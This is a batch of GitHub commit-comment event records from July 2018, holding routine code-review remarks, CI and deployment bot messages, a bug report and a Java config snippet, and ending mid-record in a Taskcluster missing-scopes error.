{"id":"8005569647","type":"CommitCommentEvent","actor":{"login":"cdupuis"},"repo":{"name":"atomist/sdm-pack-fingerprints"},"payload":{"comment":{"id":29803897,"position":73,"line":139,"path":"src/handlers/commands/pushImpactCommandHandlers.ts","commit_id":"430140fbc6d088a9916aeef6923ee0ec43ad17e2","created_at":"2018-07-23T18:13:59Z","updated_at":"2018-07-23T18:13:59Z","author_association":"CONTRIBUTOR","body":"`queryPreference(cli.context.graphClient)`?"}},"created_at":"2018-07-23T18:13:59Z"}
{"id":"8005574241","type":"CommitCommentEvent","actor":{"login":"nicothin"},"repo":{"name":"nicothin/test-console"},"payload":{"comment":{"id":29803910,"position":null,"line":null,"path":null,"commit_id":"0aa3163a7cdf5736839bb48f172cca8e25c8d2d6","created_at":"2018-07-23T18:14:55Z","updated_at":"2018-07-23T18:14:55Z","author_association":"OWNER","body":"этот коммит — говно"}},"created_at":"2018-07-23T18:14:55Z"}
{"id":"8005575603","type":"CommitCommentEvent","actor":{"login":"cdupuis"},"repo":{"name":"atomist/sdm-pack-fingerprints"},"payload":{"comment":{"id":29803913,"position":22,"line":79,"path":"src/handlers/events/pushImpactHandler.ts","commit_id":"430140fbc6d088a9916aeef6923ee0ec43ad17e2","created_at":"2018-07-23T18:15:10Z","updated_at":"2018-07-23T18:15:10Z","author_association":"CONTRIBUTOR","body":"`ctx.messageClient.addressChannels(message, diff.channel);` should now work after updating @atomist/sdm."}},"created_at":"2018-07-23T18:15:10Z"}
{"id":"8005576282","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29803918,"position":null,"line":null,"path":null,"commit_id":"faced5f698fb150b0d714225a5190d24e4f6ad21","created_at":"2018-07-23T18:15:17Z","updated_at":"2018-07-23T18:15:17Z","author_association":"OWNER","body":"or just run the singles regen script in miscellaneous.  "}},"created_at":"2018-07-23T18:15:17Z"}
{"id":"8005576396","type":"CommitCommentEvent","actor":{"login":"chantastic"},"repo":{"name":"davo/awesome-react-framer-x"},"payload":{"comment":{"id":29803919,"position":null,"line":null,"path":null,"commit_id":"065a244c10111a92ded9563c9125de5aa37dd71a","created_at":"2018-07-23T18:15:18Z","updated_at":"2018-07-23T18:15:18Z","author_association":"NONE","body":"Thanks for adding these :)"}},"created_at":"2018-07-23T18:15:18Z"}
{"id":"8005576950","type":"CommitCommentEvent","actor":{"login":"wizardofid"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29803921,"position":null,"line":null,"path":null,"commit_id":"b02dda405cbaf501a4ef7f3a61d8fb51374e7868","created_at":"2018-07-23T18:15:24Z","updated_at":"2018-07-23T18:15:24Z","author_association":"NONE","body":"@greyson-signal Seems like there is still missing something. I had group messages time out after roughly a minute today. One-to-one-messages worked fine. \r\nI tested two conditions, weak cellular network and WiFi without internet connection. Here's a debug log: https://debuglogs.org/945e13fb2c8120fb60c5ebca709dcd733e8a5dffed6a23c06c6b20b786082c0d\r\nThanks, Wiz"}},"created_at":"2018-07-23T18:15:24Z"}
{"id":"8005577455","type":"CommitCommentEvent","actor":{"login":"cha70v"},"repo":{"name":"cha70v/test-console"},"payload":{"comment":{"id":29803924,"position":null,"line":null,"path":null,"commit_id":"5a2e7d906dec1e310f1be7be6cc6fa3f3e68ac31","created_at":"2018-07-23T18:15:30Z","updated_at":"2018-07-23T18:15:30Z","author_association":"OWNER","body":"я хакер"}},"created_at":"2018-07-23T18:15:30Z"}
{"id":"8005587493","type":"CommitCommentEvent","actor":{"login":"yanboliang"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":29803947,"position":241,"line":241,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"2c4359e914ebdd76d5c22619cdad7213d29fa206","created_at":"2018-07-23T18:17:27Z","updated_at":"2018-07-23T18:17:27Z","author_association":"CONTRIBUTOR","body":"We should have a param ```leafPredictionCol```, if users set this param explicitly, we will generate a new column which is the output of leaf prediction. I think this is the last issue that we missed in the [list](https://github.com/dmlc/xgboost/issues/3336). Would you like to send a PR? Thanks."}},"created_at":"2018-07-23T18:17:27Z"}
{"id":"8005590524","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29803953,"position":null,"line":null,"path":null,"commit_id":"c410fd4cc7ed66061bc42a6cac672ad44b83a98e","created_at":"2018-07-23T18:18:01Z","updated_at":"2018-07-23T18:18:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Followers and following tabs](https://trello.com/c/SgKvG3cy/7-followers-and-following-tabs)"}},"created_at":"2018-07-23T18:18:01Z"}
{"id":"8005593610","type":"CommitCommentEvent","actor":{"login":"cdupuis"},"repo":{"name":"atomist/sdm-pack-fingerprints"},"payload":{"comment":{"id":29803957,"position":100,"line":154,"path":"src/handlers/commands/pushImpactCommandHandlers.ts","commit_id":"430140fbc6d088a9916aeef6923ee0ec43ad17e2","created_at":"2018-07-23T18:18:38Z","updated_at":"2018-07-23T18:18:38Z","author_association":"CONTRIBUTOR","body":"`function sendMessage(text:string, options: Array<{text: string, value: string}>): Promise<void>`"}},"created_at":"2018-07-23T18:18:38Z"}
{"id":"8005594506","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29803963,"position":4,"line":6,"path":"code/drasil-example/Drasil/GamePhysics/Body.hs","commit_id":"7b209a26d9baee132ecd7e891c6063fe7b1fd6ec","created_at":"2018-07-23T18:18:48Z","updated_at":"2018-07-23T18:18:48Z","author_association":"OWNER","body":"You should use qualified imports here, i.e.\r\n```haskell\r\nimport Data.Maybe (maybeToList)\r\n```"}},"created_at":"2018-07-23T18:18:48Z"}
{"id":"8005596054","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29803966,"position":null,"line":null,"path":null,"commit_id":"981f2f128e1ec44f120e884dacd0f7ab20ad0288","created_at":"2018-07-23T18:19:07Z","updated_at":"2018-07-23T18:19:07Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [d8composer](https://d8composer-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/drupal-8-composer-no-ci](https://d8composer-static-docs.pantheonsite.io/docs/guides/drupal-8-composer-no-ci)\n- [/docs/core-updates](https://d8composer-static-docs.pantheonsite.io/docs/core-updates)\n"}},"created_at":"2018-07-23T18:19:07Z"}
{"id":"8005599648","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29803976,"position":13,"line":90,"path":"code/drasil-example/Drasil/NoPCM/Body.hs","commit_id":"7b209a26d9baee132ecd7e891c6063fe7b1fd6ec","created_at":"2018-07-23T18:19:48Z","updated_at":"2018-07-23T18:19:48Z","author_association":"OWNER","body":"This line of code is now repeated all over, and should be pulled out (with a parameter, here `nopcm_SymbMap`) and fixed in all the examples."}},"created_at":"2018-07-23T18:19:48Z"}
{"id":"8005599738","type":"CommitCommentEvent","actor":{"login":"mbivolan"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29803977,"position":4,"line":17,"path":"Testscripts/Linux/BVT-RELOAD-MODULES.sh","commit_id":"30f02e84f50daf8aeea5f7eaf867ea9a01846394","created_at":"2018-07-23T18:19:49Z","updated_at":"2018-07-23T18:19:49Z","author_association":"COLLABORATOR","body":"As @lizzha said. All the files will be converted before upload, we don't need conversion in VM any more."}},"created_at":"2018-07-23T18:19:49Z"}
{"id":"8005602403","type":"CommitCommentEvent","actor":{"login":"AVBeast"},"repo":{"name":"AVBeast/hello-world"},"payload":{"comment":{"id":29803980,"position":null,"line":null,"path":null,"commit_id":"b65f5c1c018d19dd13ec30358494121f36f40b38","created_at":"2018-07-23T18:20:19Z","updated_at":"2018-07-23T18:20:19Z","author_association":"OWNER","body":"comment to see what updates"}},"created_at":"2018-07-23T18:20:19Z"}
{"id":"8005603260","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29803984,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T18:20:29Z","updated_at":"2018-07-23T18:20:29Z","author_association":"NONE","body":"Okay, I have just changed it to the following, is this suitable?\r\n\r\n```java\r\n    public static void loadConfig(FileConfiguration config) {\r\n        enabled = config.getBoolean(\"enabled\", false);\r\n        debug = config.getBoolean(\"debug\", true);\r\n        randomiseEnchantments = config.getBoolean(\"randomiseEnchantments\", true);\r\n        allowExternalConfigurations = config.getBoolean(\"allowExternalConfigurations\", true);\r\n        enchantments = new ConfigItemEnchantments();\r\n        if (config.isList(\"makeEnchantable\")) {\r\n            List<?> makeEnchantables = config.getList(config.getCurrentPath());\r\n            for (Object setupItemObject : makeEnchantables) {\r\n                // If this item is not a map, skip\r\n                if (!(setupItemObject instanceof Map<?, ?>)) {\r\n                    continue;\r\n                }\r\n                Map<?, ?> setupItem = (Map<?, ?>) setupItemObject;\r\n                // If this item specifies no items, skip\r\n                if (!setupItem.containsKey(\"items\")) {\r\n                    continue;\r\n                }\r\n                // If this item has a malformed item list, skip\r\n                Object itemsRaw = setupItem.get(\"items\");\r\n                if (!(itemsRaw instanceof List<?>)) {\r\n                    continue;\r\n                }\r\n                // Loop through item materials and any those that parse correctly\r\n                List<Material> setupMaterials = new ArrayList<>();\r\n                for (Object itemListing : (List<?>)itemsRaw) {\r\n                    Material itemMaterial = Material.getMaterial(itemListing.toString());\r\n                    if (itemMaterial != null) {\r\n                        setupMaterials.add(itemMaterial);\r\n                    }\r\n                }\r\n                // If any enchantments have been specified, parse them\r\n                List<EnchantmentVerbose> setupEnchantments = new ArrayList<>();\r\n                if (setupItem.containsKey(\"enchants\")) {\r\n                    Object enchantsRaw = setupItem.get(\"enchants\");\r\n                    // Only parse if it's a formed list\r\n                    if (enchantsRaw instanceof List<?>) {\r\n                        for (Object enchantListing : (List<?>) enchantsRaw) {\r\n                            Enchantment enchant = Enchantment.getByName(enchantListing.toString());\r\n                            EnchantmentVerbose verbose = EnchantmentVerbose.fromEnchant(enchant);\r\n                            if (verbose != null) {\r\n                                setupEnchantments.add(verbose);\r\n                            }\r\n                        }\r\n                    }\r\n                }\r\n                // Apply the materials and their enchantments\r\n                for (Material itemMaterial : setupMaterials) {\r\n                    for (EnchantmentVerbose itemEnchantment : setupEnchantments) {\r\n                        enchantments.addEnchantmentForItem(itemMaterial, itemEnchantment);\r\n                    }\r\n                }\r\n            }\r\n        }\r\n        // Allow other plugins to modify the configuration\r\n        if (allowExternalConfigurations) {\r\n            MoreEnchantablesConfigEvent event = new MoreEnchantablesConfigEvent(enchantments);\r\n            MoreEnchantablesPlugin.instance.getServer().getPluginManager().callEvent(event);\r\n        }\r\n        enchantments.lock();\r\n    }\r\n```"}},"created_at":"2018-07-23T18:20:29Z"}
{"id":"8005607056","type":"CommitCommentEvent","actor":{"login":"charlesreid1"},"repo":{"name":"dahak-metagenomics/dahak"},"payload":{"comment":{"id":29803994,"position":null,"line":null,"path":null,"commit_id":"d713a9a2040922a0223fe98391c10b1d46be44da","created_at":"2018-07-23T18:21:15Z","updated_at":"2018-07-23T18:21:15Z","author_association":"MEMBER","body":"Implements a generic parameter file fix to the hard-coded command line fix in #115 \r\n\r\nMegahit: 0.20 --> 0.80"}},"created_at":"2018-07-23T18:21:15Z"}
{"id":"8005608246","type":"CommitCommentEvent","actor":{"login":"storm119"},"repo":{"name":"storm119/android_frameworks_base"},"payload":{"comment":{"id":29803996,"position":null,"line":null,"path":null,"commit_id":"fbdc8deeeff133351711568ea058bc63ea319980","created_at":"2018-07-23T18:21:29Z","updated_at":"2018-07-23T18:21:29Z","author_association":"OWNER","body":"@varund7726  Sorry I didn't notice your comments (my bad)...and I'll take a note.\r\n\r\nPs...I sincerely tagged you (and alex + kufi) because...I wanted to say thank/credit you (all) and let's others know the original author (from where I sourced of). And sorry for not keeping the commit history... "}},"created_at":"2018-07-23T18:21:29Z"}
{"id":"8005613818","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29804003,"position":null,"line":null,"path":null,"commit_id":"c831ff8162f5a816ea1e892816c5f1aa929a5765","created_at":"2018-07-23T18:22:33Z","updated_at":"2018-07-23T18:22:33Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-262](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-262).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-262-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T18:22:33Z"}
{"id":"8005615418","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804007,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-23T18:22:50Z","updated_at":"2018-07-23T18:22:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:22:50Z"}
{"id":"8005619150","type":"CommitCommentEvent","actor":{"login":"Bladealex"},"repo":{"name":"Bladealex/mfalejandro"},"payload":{"comment":{"id":29804015,"position":null,"line":null,"path":null,"commit_id":"2a9f4f7382265deba1d2af0072e524a1a98fc81f","created_at":"2018-07-23T18:23:30Z","updated_at":"2018-07-23T18:23:30Z","author_association":"OWNER","body":"Bien"}},"created_at":"2018-07-23T18:23:30Z"}
{"id":"8005621070","type":"CommitCommentEvent","actor":{"login":"gforce2k5"},"repo":{"name":"gforce2k5/Enigma"},"payload":{"comment":{"id":29804019,"position":null,"line":null,"path":null,"commit_id":"a4322d8924a01cb9bdd4dbd8f56a683778afb97e","created_at":"2018-07-23T18:23:52Z","updated_at":"2018-07-23T18:23:52Z","author_association":"OWNER","body":"Closes #1 "}},"created_at":"2018-07-23T18:23:52Z"}
{"id":"8005622050","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804022,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-23T18:24:03Z","updated_at":"2018-07-23T18:24:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:24:03Z"}
{"id":"8005651830","type":"CommitCommentEvent","actor":{"login":"hezhanle"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29804104,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T18:29:41Z","updated_at":"2018-07-23T18:29:41Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-23T18:29:41Z"}
{"id":"8005653964","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804109,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-23T18:30:04Z","updated_at":"2018-07-23T18:30:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:30:04Z"}
{"id":"8005656720","type":"CommitCommentEvent","actor":{"login":"guyknowsguy"},"repo":{"name":"RobinDavid/Motion-detection-OpenCV"},"payload":{"comment":{"id":29804121,"position":null,"line":null,"path":null,"commit_id":"d1d20e5404abc3002435eb47ee22301fb23db65e","created_at":"2018-07-23T18:30:33Z","updated_at":"2018-07-23T18:30:33Z","author_association":"NONE","body":"I just  wanted to run this and see for myself as I am relatively new to programming ,but i got this error\r\n\"No module named 'cv2.cv'\r\ncould you please help. I liked your code and wanted to use it,would be glad to receive a response."}},"created_at":"2018-07-23T18:30:33Z"}
{"id":"8005656926","type":"CommitCommentEvent","actor":{"login":"vkarpov15"},"repo":{"name":"mongodb-js/mongodb-core"},"payload":{"comment":{"id":29804123,"position":null,"line":null,"path":null,"commit_id":"107bae5083d40b8521b5796469ddbc3ea2063c7a","created_at":"2018-07-23T18:30:35Z","updated_at":"2018-07-23T18:30:35Z","author_association":"MEMBER","body":"Another possibility would be allowing specifying `family` in the connection string. It is non-standard, but would make it easier to switch between ipv4 for local vs ipv6 for prod or vice versa."}},"created_at":"2018-07-23T18:30:35Z"}
{"id":"8005660961","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804141,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-23T18:31:18Z","updated_at":"2018-07-23T18:31:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:31:18Z"}
{"id":"8005661000","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29804142,"position":null,"line":null,"path":null,"commit_id":"ecdeb500eb62ea1093590cdb2f4d69d10c366c39","created_at":"2018-07-23T18:31:18Z","updated_at":"2018-07-23T18:31:18Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-23T18:31:18Z"}
{"id":"8005662575","type":"CommitCommentEvent","actor":{"login":"jjaffeux"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29804148,"position":57,"line":68,"path":"app/assets/javascripts/discourse/models/login-method.js.es6","commit_id":"eda1462b3b8f57aace0c49b1d64edfcf3d1f45b2","created_at":"2018-07-23T18:31:37Z","updated_at":"2018-07-23T18:31:37Z","author_association":"CONTRIBUTOR","body":"Cant we rewrite this to use interpolation ?"}},"created_at":"2018-07-23T18:31:37Z"}
{"id":"8005667331","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804160,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-23T18:32:31Z","updated_at":"2018-07-23T18:32:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:32:31Z"}
{"id":"8005673594","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29804177,"position":26,"line":48,"path":"lib/elixir/src/elixir_module.erl","commit_id":"0f2fc3d2e2f5f42b3586f37c8db4038099a948c2","created_at":"2018-07-23T18:33:47Z","updated_at":"2018-07-23T18:33:47Z","author_association":"MEMBER","body":"We should have a clause for `nil`."}},"created_at":"2018-07-23T18:33:47Z"}
{"id":"8005673615","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804178,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-23T18:33:48Z","updated_at":"2018-07-23T18:33:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:33:48Z"}
{"id":"8005676203","type":"CommitCommentEvent","actor":{"login":"jkp"},"repo":{"name":"jkp/pipenv"},"payload":{"comment":{"id":29804186,"position":11,"line":69,"path":"tests/integration/test_install_twists.py","commit_id":"7bb1099269eb62c7dade9ab4238572fb90e4ea78","created_at":"2018-07-23T18:34:20Z","updated_at":"2018-07-23T18:34:20Z","author_association":"OWNER","body":"Probably not looking at it."}},"created_at":"2018-07-23T18:34:20Z"}
{"id":"8005677394","type":"CommitCommentEvent","actor":{"login":"Ellypse"},"repo":{"name":"Ellypse/Total-RP-3"},"payload":{"comment":{"id":29804191,"position":14,"line":643,"path":"totalRP3/modules/register/main/register_tooltip.lua","commit_id":"e1e300433a8ca86f317bb866e3e415e0c3526b04","created_at":"2018-07-23T18:34:35Z","updated_at":"2018-07-23T18:34:35Z","author_association":"OWNER","body":"Use Ellyb"}},"created_at":"2018-07-23T18:34:35Z"}
{"id":"8005679506","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29804194,"position":5,"line":15,"path":"lib/elixir/src/elixir_quote.erl","commit_id":"c131cc43cf39af3813d4ccc21758269e2ba589a1","created_at":"2018-07-23T18:35:02Z","updated_at":"2018-07-23T18:35:02Z","author_association":"MEMBER","body":"Is this more efficient than the previous approach? Or was it done for code clarity?"}},"created_at":"2018-07-23T18:35:02Z"}
{"id":"8005679606","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804196,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-23T18:35:03Z","updated_at":"2018-07-23T18:35:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:35:03Z"}
{"id":"8005680960","type":"CommitCommentEvent","actor":{"login":"jahraphael"},"repo":{"name":"RaiderIO/raiderio-addon"},"payload":{"comment":{"id":29804198,"position":10,"line":2629,"path":"core.lua","commit_id":"7b3604dacd1256d84e68a88b43694bfe40735786","created_at":"2018-07-23T18:35:20Z","updated_at":"2018-07-23T18:35:20Z","author_association":"COLLABORATOR","body":"Does Lua regex let you do conditional groups, like this perl regex:\r\n`item:(?:130819|158923):...` to mean that it would match either of those numbers? It would be more efficient to not have two separate regexes with everything equal except those two numbers."}},"created_at":"2018-07-23T18:35:20Z"}
{"id":"8005683822","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"marco-c/mozilla-releng-services"},"payload":{"comment":{"id":29804201,"position":null,"line":null,"path":null,"commit_id":"d6edba1df2aa08c30ff77c47a731886181e20c3d","created_at":"2018-07-23T18:35:55Z","updated_at":"2018-07-23T18:35:55Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1532370955506\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.d6edba1df2aa08c30ff77c47a731886181e20c3d\",\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:repo:github.com/marco-c/mozilla-releng-services:branch:master\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:index.garbage.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:scheduler-id:taskcluster-github\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1532370955506\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.d6edba1df2aa08c30ff77c47a731886181e20c3d\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       